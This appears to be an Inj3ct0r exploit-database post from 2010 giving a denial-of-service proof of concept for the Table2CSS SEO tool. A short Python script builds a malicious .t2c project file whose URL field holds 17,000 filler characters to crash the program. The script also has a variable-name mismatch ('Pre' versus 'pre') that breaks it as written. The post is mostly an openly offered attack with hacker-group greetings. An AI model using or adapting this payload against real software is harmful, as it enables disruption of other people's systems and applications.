|
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ################################### 1
0 I'm SONiC member from Inj3ct0r Team 1
1 ################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : Table2CSS ---Denial of Service PoC
Date : August 5 ,2010
Critical Level :Low
vendor URL :?? http://www.table2css.com
#######################################################################################################
Author : ..::[ SONiC ]::.. aka ~the_pshyco~ <sonicdefence[at]gmail.com>
Special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,MA1201,D3aD F0x,Nishi,Bunny
Greetz to :iNj3cT0r.com, www.andhrahackers.com
#######################################################################################################
Description:
TABLE2CSS is a SEO tool that converts HTML pages with tables to tableless CSS code. It is invaluable if you want to :
Reduce the percentage of HTML markup in your pages and get a better search engine ranking.
Reduce the overall size of your web pages and even further improve your positioning in search engines.
Replace the complex table layout in your website with simpler, easily maintainable CSS code.
#######################################################################################################
Denial of Service - PoC
junk = "A"*17000
Pre = '''<root><version>17</version><outputDir/><cssLocation>{FILE}.css</cssLocation>
<pageWidth>1024</pageWidth><pageHeight>768</pageHeight><urls><url>'''
After = '''</url></urls></root>'''
payload = pre+junk+after
file = open("WTF.t2c","w")
file.write(payload)
file.close()
print('done!!')
###############################################################################################################
# ..::[ SONiC ]::.. aka the_pshyco
|